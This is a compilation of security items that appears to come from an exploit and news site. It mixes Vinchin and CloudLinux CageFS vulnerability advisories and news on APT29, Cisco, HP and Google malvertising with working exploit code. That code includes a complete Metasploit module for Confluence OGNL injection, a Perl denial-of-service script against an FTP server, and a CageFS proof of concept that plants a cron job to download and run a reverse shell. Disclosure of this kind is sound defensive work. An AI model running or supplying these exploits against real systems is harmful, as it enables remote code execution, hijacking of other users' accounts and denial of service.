A critical security issue has been discovered in Vinchin Backup and Recovery version 7.2. The software has been found to use default MYSQL credentials, which could lead to significant security risks.

    CVE ID: CVE-2024-22901Title: Default MYSQL Credentials Vulnerability in Vinchin Backup & Recovery v7.2Description:A critical security issue, identified as CVE-2024-22901, has been discovered in Vinchin Backup & Recovery version 7.2. The software has been found to use default MYSQL credentials, which could lead to significant security risks.Additional Information:Vinchin has not addressed previous disclosures, including CVE-2022-35866, and has not patched the reported vulnerabilities. The presence of these unresolved issues, now compounded by the newly discovered vulnerability of default MYSQL credentials, opens up potential avenues for easy unauthenticated Remote Code Execution (RCE). This lack of response is alarming for a product that is certified in cybersecurity and poses a considerable risk to its users.Vulnerability Type:Incorrect Access ControlVendor of Product:VinchinAffected Product Code Base:Vinchin Backup & Recovery - Version 7.2Affected Component:The MySQL database used by Vinchin Backup & RecoveryAttack Type:RemoteImpact - Escalation of Privileges:TrueAttack Vectors:The vulnerability can be exploited via local or remote access, utilizing the unpatched default MySQL credentials.Discoverer:Valentin LobsteinReference:http://vinchin.comConclusion:The discovery of CVE-2024-22901 highlights a critical oversight in Vinchin Backup & Recovery's security posture. Users are advised to be cautious and to monitor for any updates or patches from Vinchin, which should be applied immediately to mitigate this risk.Signed,Valentin Lobstein

Vinchin Backup And Recovery 7.2 Default MySQL Credentials

Vinchin Backup and Recovery versions 7.2 and below suffer from a command injection vulnerability in the syncNtpTime function.

    CVE ID: CVE-2024-22899Title: Command Injection Vulnerability in Vinchin Backup and Recovery's syncNtpTime Function in Versions 7.2 and EarlierDescription:A critical security vulnerability, identified as CVE-2024-22899, has been discovered in the `syncNtpTime` function of Vinchin Backup and Recovery software. This issue affects versions 7.2 and earlier. The function, part of the `SystemHandler.class.php` file, is designed for synchronizing system time with NTP servers but is prone to a command injection vulnerability due to improper handling of user input.Function Analysis:- The function is responsible for handling the `ntphost` parameter, which is expected to contain the address of the NTP server.- The vulnerability stems from the direct concatenation of this parameter into a system command line, without adequate validation or sanitization.- This design flaw allows an attacker to inject arbitrary commands into the `ntphost` parameter, which are then executed by the system.Current Status:As of now, there is no patch available for this vulnerability in versions 7.2 and earlier of Vinchin Backup and Recovery. Users of these versions are at risk of exploitation.Recommendation:It is advised for users of Vinchin Backup and Recovery versions 7.2 and earlier to remain alert and monitor for updates from Vinchin. Once a patch becomes available, it should be applied immediately to mitigate the risk posed by this vulnerability.Conclusion:The discovery of CVE-2024-22899 underscores the importance of rigorous input validation and sanitization in software development. This vulnerability poses a severe security risk, potentially leading to unauthorized system access or control.Signed,Valentin Lobstein

Vinchin Backup And Recovery 7.2 syncNtpTime Command Injection

CloudLinux CageFS versions 7.1.1-1 and below pass the authentication token as a command line argument. In some configurations this allows local users to view the authentication token via the process list and gain code execution as another user.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

# CloudLinux CageFS Token Disclosure #

Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure

## Vulnerability Overview ##

CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a  
command line argument. In some configurations this allows local users to  
view the authentication token via the process list and gain code execution  
as another user.

* **Identifier**            : SBA-ADV-20200707-01  
* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information  
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)  
* **Vendor**                : CloudLinux Inc.  
* **Affected Versions**     : <= 7.1.1-1  
* **Fixed in Version**      : 7.1.2-2  
* **CVE ID**                : CVE-2020-36771  
* **CVSS Vector**           : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
* **CVSS Base Score**       : 7.8 (High)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves  
> server stability, density, and security by isolating each tenant and  
> giving them allocated server resources. This creates an environment  
> that feels more like a virtual server than a shared hosting account.  
> By doing so, CloudLinux OS reduces operating costs and churn rates,  
> and increases profitability.

Source: <https://www.cloudlinux.com/>

## Impact ##

If the `lve_namespaces` service or the virtualized proc filesystem  
feature is disabled, a local user can obtain the CageFS authentication  
token of other users by exploiting the vulnerability documented in this  
advisory. In most configurations this allows attackers to gain code  
execution as those users.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.  
It allows limited execution of commands outside the CageFS environment from  
a user restricted within the CageFS envinronment.

For this purpose a CageFS daemon runs outside of the CageFS environment,  
it is accessible via a UNIX socket from within the CageFS environment.  
The UNIX socket is handled by `proxyexec`. To make the whole process of  
calling a tool outside of the CageFS transparent to the user, wrapper  
scripts are placed within CageFS, which in turn call `proxyexec` for  
execution of the commands outside of the CageFS environment.

Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`  
and pass it to the `proxyexec` command as a command line argument.

CloudLinux by default enables the virtualized proc filesystem, which  
prevents other users from seeing the CageFS token within the process  
list. However, if the `lve_namespaces` service is disabled, e.g. the  
systemd unit is masked out, or the virtualized proc filesystem is  
explicitly disabled, other users can see the CageFS token within the  
process list. They can use the CageFS token of other users to talk to  
the CageFS daemon via `proxyexec` and the CageFS daemon executes the  
commands with the privileges of the supplied authentication token.

## Proof of Concept ##

Let's assume, the `lve_namespaces` service is disabled and we are user  
`ftp2406151`:

```sh  
$ id  
uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)  
```

We list the process list and find another user executing `ping example.org`:

```sh  
$ ps aux | grep proxyexec  
 2094 root      0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server  
1180646 934       0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642 example.org  
1180647 root      0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server  
1181229 ftp24061  0:00 grep proxyexec  
```

We now can execute commands as user `ftp1488781` and, for example, view  
the crontab:

```sh  
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0  
no crontab for ftp1488781  
```

Now we setup a new crontab entry, which downloads a reverse shell and  
executes it every minute:

```sh  
$ echo '* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0  
```

```sh  
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0  
* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &  
```

Our shell connects back to us and we can execute arbitrary commands as  
the other user:

```sh  
$ nc -l -p 1234  
id  
uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)  
```

## Recommended Countermeasures ##

We recommend to avoid passing sensitive information as a command line  
argument. Instead, `proxyexec` should directly read the CageFS token  
from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS  
daemon via the UNIX socket.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version 7.0.6-1  
* `2020-07-10`: initial vendor contact  
* `2020-07-13`: initial vendor response  
* `2020-07-13`: disclosed vulnerability to vendor security contact  
* `2020-09-02`: vendor released version 7.1.2-2 to testing  
* `2020-09-28`: vendor released version 7.1.2-2 to production  
* `2020-10-02`: request CVE from MITRE  
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat  
* `2024-01-19`: request CVE from Red Hat  
* `2024-01-22`: Red Hat assigned CVE-2020-36771  
* `2024-01-25`: public disclosure

## References ##

* CloudLinux OS Documentation. Virtualized /proc filesystem: <https://docs.cloudlinux.com/shared/cloudlinux_os_kernel/#virtualized-proc-filesystem>  
* CageFS 7.1.2-2 beta: <https://blog.cloudlinux.com/beta-cagefs-lve-wrappers-and-bsock-updated>  
* CageFS 7.1.2-2 production: <https://blog.cloudlinux.com/cagefs-lve-wrappers-and-bsock-have-been-rolled-out-to-100>

## Credits ##

* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWynusACgkQ+7iGL1j3  
dbKzLhAAwKYUzx9v+tPeTNNUUrgxibQSZIhtxcvpdfYTFQAm+Rj71F8g+FZIqV0D  
5uMjUtutldd1Mh9YfEQ5hGbOawYqnfL9tebEX1SqdbraSD3r4tQEAMowgBMREpFJ  
DgUyIVTSnFVTQqcai2wpObPRgs397qM8mrykH5rAKdLD1kBfpULq7Duec62E740u  
Ay4YiIiO0OZWf7WElH3KunICE/Sv4TzqZ3DEIlSsQZQv8zM5r44O93FhMiMO6n3R  
pKfK8F4ub2y4e3gkW1uaoGO7ZwAW3aR+F5FAi6R5MJXm0RxIibL9tqCyVVrlXTS6  
BZiFzsE9ATSSMGVGGH6O6rb1KXXXTc5jopEjGbQgWMKmZn+NK4yHzITFydzJi04P  
oaoQmbBWyN4OdfGApvUomyqPp6uUE+i1RfniHq+7vmIR5I7D/KsLQorYonmwD/26  
b5BQ99M7sNGHlWbt1vn9imtDj+nw9JTK2425t6swJOc4QPxdKQtx6hESvRJHiPer  
M3VFmgj9c19mXQb2B+k+GgM4h7lrhvOyWGreWo1sOBtwcLX7i3zqkCOqowI3DedE  
cWV2qjNqTUqM4EMn6Gx5Rf32Kp6e1Jj0GXmMl7TVY5taBSyQ7UXPJkLT6MfyM1v6  
hf5wIsINv1dNRQxpWgXiDvZ+d0AdSNxYfRZFe1wyQIKQbwLYm6w=  
=d1f0  
-----END PGP SIGNATURE-----

CloudLinux CageFS 7.1.1-1 Token Disclosure

This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Atlassian Confluence SSTI Injection',        'Description' => %q{          This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses          the injection to evaluate an OGNL expression resulting in OS command execution.          Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.        },        'Author' => [          'Rahul Maini', # ProjectDiscovery analysis          'Harsh Jaiswal', # ProjectDiscovery analysis          'Spencer McIntyre'        ],        'References' => [          ['CVE', '2023-22527'],          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html'],          ['URL', 'https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/']        ],        'DisclosureDate' => '2024-01-16', # Atlassian advisory released        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux', 'win'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Payload' => { 'Space' => 8191, 'DisableNops' => true }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8090        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def get_confluence_platform    # this method gets the platform by exploiting CVE-2023-22527    return @confluence_platform if @confluence_platform    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')      @org.apache.struts2.ServletActionContext@getResponse().setHeader(        '#{header}',        (@java.lang.System@getProperty('os.name'))      )    OGNL    res = inject_ognl(ognl)    return nil unless res    res.headers[header]  end  def check    confluence_version = get_confluence_version    return CheckCode::Unknown('Failed to determine the Confluence version.') unless confluence_version    vprint_status("Detected Confluence version: #{confluence_version}")    if confluence_version > Rex::Version.new('8.5.3')      return CheckCode::Safe("Version #{confluence_version} is not affected.")    end    confluence_platform = get_confluence_platform    unless confluence_platform      return CheckCode::Safe('Failed to test OGNL injection.')    end    vprint_status("Detected target platform: #{confluence_platform}")    CheckCode::Vulnerable('Successfully tested OGNL injection.')  end  def exploit    confluence_platform = get_confluence_platform    unless confluence_platform      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')    end    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")    end    print_status("Executing #{payload_instance.refname} (#{target.name})")    execute_command(payload.encoded)  end  def execute_command(cmd, _opts = {})    param = rand_text_alphanumeric(6..10)    # reference a parameter in the OGNL to work around the 200 character length limit    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')      (new freemarker.template.utility.Execute()).exec(        {@org.apache.struts2.ServletActionContext@getRequest().getParameter('#{param}')}      )    OGNL    if target['Platform'] == 'win'      vars_post = { param => "cmd.exe /c \"#{cmd}\"" }    else      # the command is executed via Runtime.exec, so sh -c "#{cmd}" will not work with all payloads      # see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html?m=1      vars_post = { param => "sh -c $@|sh . echo #{cmd}" }    end    inject_ognl(ognl, 'vars_post' => vars_post)  end  def inject_ognl(ognl, opts = {})    opts = opts.clone    param = rand_text_alphanumeric(6..10)    final_opts = {      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'template/aui/text-inline.vm'),      'vars_post' => {        # label and param are both limited to a 200 character length by default        'label' => "\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.#{param},{})+\\u0027",        param => ognl      }.merge(opts.delete('vars_post') || {})    }.merge(opts)    send_request_cgi(final_opts)  endend

Atlassian Confluence SSTI Injection

Vinchin Backup and Recovery versions 7.2 and below suffer from a command injection vulnerability in the setNetworkCardInfo function.

    CVE ID: CVE-2024-22900Title: Command Injection Vulnerability in Vinchin Backup and Recovery Versions 7.2 and EarlierDescription:A critical security vulnerability, identified as CVE-2024-22900, has been discovered in Vinchin Backup and Recovery software, affecting versions 7.2 and earlier. The vulnerability is present in the `setNetworkCardInfo` function, which is intended to update network card information.Details:1. The function collects the `NAME` parameter from the user request and assigns it to a variable `$name`.2. The `NAME` parameter value is then used to construct a file path in the `setNetworkCardInfo` function, leading to potential command injection.3. The vulnerability arises from the use of user-supplied input in system commands without proper validation and sanitization.Impact:This vulnerability allows an attacker to inject arbitrary commands via the `NAME` parameter, potentially leading to unauthorized access or control over the affected system.Current Status:As of the current date, there is no known patch available for this vulnerability. Users of Vinchin Backup and Recovery versions 7.2 and earlier are at risk.Recommendation:It is strongly recommended that users of the affected software versions remain vigilant and monitor Vinchin's updates for a security patch. Upon release of a patch, users should prioritize updating their systems to mitigate this security risk.Signed,Valentin Lobstein

Vinchin Backup And Recovery 7.2 setNetworkCardInfo Command Injection

Microsoft on Thursday said the Russian state-sponsored threat actors responsible for a cyber attack on its systems in late November 2023 have been targeting other organizations and that it's currently beginning to notify them.
The development comes a day after Hewlett Packard Enterprise (HPE) revealed that it had been the victim of an attack perpetrated by a hacking crew

Threat Intelligence / Cyber Attack

Microsoft on Thursday said the Russian state-sponsored threat actors responsible for a cyber attack on its systems in late November 2023 have been targeting other organizations and that it's currently beginning to notify them.

The development comes a day after Hewlett Packard Enterprise (HPE) revealed that it had been the victim of an attack perpetrated by a hacking crew tracked as **APT29**, which is also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes.

"This threat actor is known to primarily target governments, diplomatic entities, non-governmental organizations (NGOs) and IT service providers, primarily in the U.S. and Europe," the Microsoft Threat Intelligence team said in a new advisory.

The primary goal of these espionage missions is to gather sensitive information that is of strategic interest to Russia by maintaining footholds for extended periods of time without attracting any attention.

The latest disclosure indicates that the scale of the campaign may have been bigger than previously thought. The tech giant, however, did not reveal which other entities were singled out.

APT29's operations involve the use of legitimate but compromised accounts to gain and expand access within a target environment and fly under the radar. It's also known to identify and abuse OAuth applications to move laterally across cloud infrastructures and for post-compromise activity, such as email collection.

"They utilize diverse initial access methods ranging from stolen credentials to supply chain attacks, exploitation of on-premises environments to laterally move to the cloud, and exploitation of service providers' trust chain to gain access to downstream customers," Microsoft noted.

Another notable tactic entails the use of breached user accounts to create, modify, and grant high permissions to OAuth applications that they can misuse to hide malicious activity. This enables threat actors to maintain access to applications, even if they lose access to the initially compromised account, the company pointed out.

These malicious OAuth applications are ultimately used to authenticate to Microsoft Exchange Online and target Microsoft corporate email accounts to exfiltrate data of interest.

In the incident targeting Microsoft in November 2023, the threat actor used a password spray attack to successfully infiltrate a legacy, non-production test tenant account that did not have multi-factor authentication (MFA) enabled.

Such attacks are launched from a distributed residential proxy infrastructure to conceal their origins, allowing the threat actor to interact with the compromised tenant and with Exchange Online via a vast network of IP addresses that are also used by legitimate users.

"Midnight Blizzard's use of residential proxies to obfuscate connections makes traditional indicators of compromise (IoC)-based detection infeasible due to the high changeover rate of IP addresses," Redmond said, necessitating that organizations take steps to defend against rogue OAuth applications and password spraying.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of Widening APT29 Espionage Attacks Targeting Global Orgs

Cisco has released patches to address a critical security flaw impacting Unified Communications and Contact Center Solutions products that could permit an unauthenticated, remote attacker to execute arbitrary code on an affected device.
Tracked as CVE-2024-20253 (CVSS score: 9.9), the issue stems from improper processing of user-provided data that a threat actor could abuse to send a

Network Security / Vulnerability

Cisco has released patches to address a critical security flaw impacting Unified Communications and Contact Center Solutions products that could permit an unauthenticated, remote attacker to execute arbitrary code on an affected device.

Tracked as **CVE-2024-20253** (CVSS score: 9.9), the issue stems from improper processing of user-provided data that a threat actor could abuse to send a specially crafted message to a listening port of a susceptible appliance.

"A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user," Cisco said in an advisory. "With access to the underlying operating system, the attacker could also establish root access on the affected device."

Synacktiv security researcher Julien Egloff has been credited with discovering and reporting CVE-2024-20253. The following products are impacted by the flaw -

*   Unified Communications Manager (versions 11.5, 12.5(1), and 14)
*   Unified Communications Manager IM & Presence Service (versions 11.5(1), 12.5(1), and 14)
*   Unified Communications Manager Session Management Edition (versions 11.5, 12.5(1), and 14)
*   Unified Contact Center Express (versions 12.0 and earlier and 12.5(1))
*   Unity Connection (versions 11.5(1), 12.5(1), and 14), and
*   Virtualized Voice Browser (versions 12.0 and earlier, 12.5(1), and 12.5(2))

While there are no workarounds that address the shortcoming, the networking equipment maker is urging users to set up access control lists to limit access where applying the updates is not immediately possible.

"Establish access control lists (ACLs) on intermediary devices that separate the Cisco Unified Communications or Cisco Contact Center Solutions cluster from users and the rest of the network to allow access only to the ports of deployed services," the company said.

The disclosure arrives weeks after Cisco shipped fixes for a critical security flaw impacting Unity Connection (CVE-2024-20272, CVSS score: 7.3) that could permit an adversary to execute arbitrary commands on the underlying system.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Cisco Flaw Lets Hackers Remotely Take Over Unified Comms Systems

By Deeba Ahmed
HP CEO Enrique Lores defended HP's practice of bricking printers when loaded with third-party ink.
This is a post from HackRead.com Read the original post: HP Claims Monopoly on Ink, Alleges 3rd-Party Cartridge Malware Risk

The company now claims that allowing third-party ink cartridges in its printers would expose them to viruses and malware.

Hewlett-Packard (HP) claims to have laptops that effectively block unwelcome snoopers, but why does the company maintain a monopoly over its ink cartridges? Well, HP is reaffirming its monopoly on refillable ink cartridges for printers following a lawsuit for blocking third-party ink with Dynamic Security updates.

The company claims that third-party cartridges can infect users’ PCs with viruses or malware, which can then reach the printer and network. In an interview with CNBC, HP CEO Enrique Lores defended HP’s practice of bricking printers when loaded with third-party ink, based on the company’s 2022 research.  It suggests ink cartridge microcontroller chips could be a cyber threat.

The company tasked Bugcrowd researchers to determine it under its bug bounty program in 2022 and learned that HP’s cartridges, which typically use a secure chip for communication with printers, could contain malicious software if sold by third parties.

HP’s chief technologist of print security, Shivaun Albright, stated back then that the hacker could inject code into the device beyond the bounds of the buffer. HP acknowledges that there is no evidence of in-the-wild exploitation of this hack, but given that the chips used in third-party ink cartridges are reprogrammable, they are indeed vulnerable.

However, Ars Technica Senior Security Editor Dan Goodin believes there are no known attacks that can infect printers using hacked ink cartridges. Goodin raised concerns about the potential use of ink cartridges as a cyber threat, but cybersecurity professionals were sceptical.

Hackread.com’s Founder and Editor, Waqas, dismisses the argument that third-party cartridges can compromise a printer with malware as weak and unconvincing. He draws a comparison, stating, “This reminds me of Kellyanne Elizabeth Conway, the Counselor to then-President Donald Trump, who quite convincingly claimed in an interview that she believes microwaves can be hacked and turned into cameras for spying purposes.”

However, Lores’ comments raise concerns about security vulnerabilities as he presented a scenario where a compromised ink cartridge could launch malware onto a connected network. HP claims its chips are secure, implying that its authentication mechanisms are reliable. Still, fearing infection from third-party cartridges may prevent some customers from purchasing ink from HP, despite HP’s claims of chip authenticity.

For your information, HP has been hit with a lawsuit over its Dynamic Security system (PDF), which stops printer operation if an ink cartridge without an HP chip or HP electronic circuitry is installed.

The lawsuit (PDF) seeks class-action certification, alleging that HP customers were not informed that firmware updates issued in late 2022 and early 2023 could result in printer features not working.

The lawsuit seeks monetary damages and an injunction to deter HP from issuing printer updates, which block ink cartridges without an HP chip as compromised ink cartridges can allow malware to invade the connected network.

Printer manufacturers like HP have faced criticism for security flaws, potentially allowing hackers to access sensitive data or control printing functions. Lores emphasized the need for stronger security measures in the printer industry.

“I think for us it is important for us to protect our IP. There is a lot of IP that we’ve built in the inks of the printers, in the printers themselves. And what we are doing is when we identify cartridges that are violating our IP, we stop the printers from work” Lores stated in an interview with CNBC.

****_RELATED ARTICLES_****

1.  HP Printer’s Hard Drive Can Be Used To Host Malicious Files
2.  Keylogger spotted – HP machines could turn into a spyware
3.  Lenovo removes backdoor in networking switches since 2004
4.  Hacker takes over thousands of Printers; sends alerts to users
5.  Researcher finds pre-installed keylogger in hundreds of HP laptops

HP Claims Monopoly on Ink, Alleges 3rd-Party Cartridge Malware Risk

Google continues to struggle with cybercriminals running malicious ads on its search platform to trick people into downloading booby-trapped copies of popular free software applications. The malicious ads, which appear above organic search results and often precede links to legitimate sources of the same software, can make searching for software on Google a dicey affair.

**Google** continues to struggle with cybercriminals running malicious ads on its search platform to trick people into downloading booby-trapped copies of popular free software applications. The malicious ads, which appear above organic search results and often precede links to legitimate sources of the same software, can make searching for software on Google a dicey affair.

Google says keeping users safe is a top priority, and that the company has a team of thousands working around the clock to create and enforce their abuse policies. And by most accounts, the threat from bad ads leading to backdoored software has subsided significantly compared to a year ago.

But cybercrooks are constantly figuring out ingenious ways to fly beneath Google’s anti-abuse radar, and new examples of bad ads leading to malware are still too common.

For example, a Google search earlier this week for the free graphic design program **FreeCAD** produced the following result, which shows that a “Sponsored” ad at the top of the search results is advertising the software available from freecad-us\[.\]org. Although this website claims to be the official FreeCAD website, that honor belongs to the result directly below — the legitimate freecad.org.

How do we know freecad-us\[.\]org is malicious? A review at **DomainTools.com** show this domain is the newest (registered Jan. 19, 2024) of more than 200 domains at the Internet address **93.190.143\[.\]252** that are confusingly similar to popular software titles, including **dashlane-project\[.\]com**, **filezillasoft\[.\]com**, **keepermanager\[.\]com**, and **libreofficeproject\[.\]com**.

Some of the domains at this Netherlands host appear to be little more than software review websites that steal content from established information sources in the IT world, including **Gartner**, **PCWorld**, **Slashdot** and **TechRadar**.

Other domains at 93.190.143\[.\]252 do serve actual software downloads, but none of them are likely to be malicious if one visits the sites through direct navigation. If one visits **openai-project\[.\]org** and downloads a copy of the popular Windows desktop management application **Rainmeter**, for example, the file that is downloaded has the same exact file signature as the real Rainmeter installer available from rainmeter.net.

But this is only a ruse, says **Tom Hegel**, principal threat researcher at the security firm **Sentinel One**. Hegel has been tracking these malicious domains for more than a year, and he said the seemingly benign software download sites will periodically turn evil, swapping out legitimate copies of popular software titles with backdoored versions that will allow cybercriminals to remotely commander the systems.

“They’re using automation to pull in fake content, and they’re rotating in and out of hosting malware,” Hegel said, noting that the malicious downloads may only be offered to visitors who come from specific geographic locations, like the United States. “In the malicious ad campaigns we’ve seen tied to this group, they would wait until the domains gain legitimacy on the search engines, and then flip the page for a day or so and then flip back.”

In February 2023, Hegel co-authored a report on this same network, which Sentinel One has dubbed **MalVirt** (a play on “malvertising”). They concluded that the surge in malicious ads spoofing various software products was directly responsible for a surge in malware infections from infostealer trojans like **IcedID**, **Redline Stealer**, **Formbook** and **AuroraStealer**.

Hegel noted that the spike in malicious software-themed ads came not long after Microsoft started blocking by default Office macros in documents downloaded from the Internet. He said the volume of the current malicious ad campaigns from this group appears to be relatively low compared to a year ago.

“It appears to be same campaign continuing,” Hegel said. “Last January, every Google search for ‘Autocad’ led to something bad. Now, it’s like they’re paying Google to get one out of every dozen of searches. My guess it’s still continuing because of the up-and-down \[of the\] domains hosting malware and then looking legitimate.”

Several of the websites at this Netherlands host (93.190.143\[.\]252) are currently blocked by Google’s Safebrowsing technology, and labeled with a conspicuous red warning saying the website will try to foist malware on visitors who ignore the warning and continue.

But it remains a mystery why Google has not similarly blocked more the 240+ other domains at this same host, or else removed them from its search index entirely. Especially considering there is nothing else but these domains hosted at that Netherlands IP address, and because they have all remained at that address for the past year.

In response to questions from KrebsOnSecurity, Google said maintaining a safe ads ecosystem and keeping malware off of its platforms is a priority across Google.

“Bad actors often employ sophisticated measures to conceal their identities and evade our policies and enforcement, sometimes showing Google one thing and users something else,” Google said in a written statement. “We’ve reviewed the ads in question, removed those that violated our policies, and suspended the associated accounts. We’ll continue to monitor and apply our protections.”

Google says it removed 5.2 billion ads in 2022, and restricted more than 4.3 billion ads and suspended over 6.7 million advertiser accounts. The company’s latest ad safety report says Google in 2022 blocked or removed 1.36 billion advertisements for violating its abuse policies.

Some of the domains referenced in this story were included in Sentinel One’s February 2023 report, but dozens more have been added since, such as those spoofing the official download sites for **Corel Draw**, **Github Desktop**, **Roboform** and **Teamviewer**.

This October 2023 report on the FreeCAD user forum came from a user who reported downloading a copy of the software from freecadsoft\[.\]com after seeing the site promoted at the top of a Google search result for “freecad.” Almost a month later, another FreeCAD user reported getting stung by the same scam.

“This got me,” FreeCAD forum user “Matterform” wrote on Nov. 19, 2023. “Please leave a report with Google so it can flag it. They paid Google for sponsored posts.”

Sentinel One’s report didn’t delve into the “who” behind this ongoing MalVirt campaign, and there are precious few clues that point to attribution. All of the domains in question were registered through **webnic.cc**, and several of them display a placeholder page saying the site is ready for content. Viewing the HTML source of these placeholder pages shows many of the hidden comments in the code are in Cyrillic.

Trying to track the crooks using Google’s Ad Transparency tools didn’t lead far. The ad transparency record for the malicious ad featuring freecad-us\[.\]org (in the screenshot above) shows that the advertising account used to pay for the ad has only run one previous ad through Google search: It advertised a wedding photography website in New Zealand.

The apparent owner of that photography website did not respond to requests for comment, but it’s also likely his Google advertising account was hacked and used to run these malicious ads.

Using Google Search to Find Software Can Be Risky

Gabriels FTP Server version 1.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Gabriels FTP Server 1.2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 25 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1k8QxfP6x908E-1QpRAVulKoAM9OEo1a8/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Gabriels FTP Server 1.2  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=wwHuXfYS8yQ

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.  
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41\x2C\x41\x20\x42"x500;

    my $ftp_socket = IO::Socket::INET->new(  
        PeerAddr => $ip,  
        PeerPort => $port,  
        Proto    => 'tcp',  
        Timeout => '10',  
    ) or die "Não foi possível se conectar ao servidor.";

    my $response = <$ftp_socket>;

    print $ftp_socket "USER $payload\r\n";

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                Gabriels FTP Server 1.2 - Denied of Service         #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Tag

#auth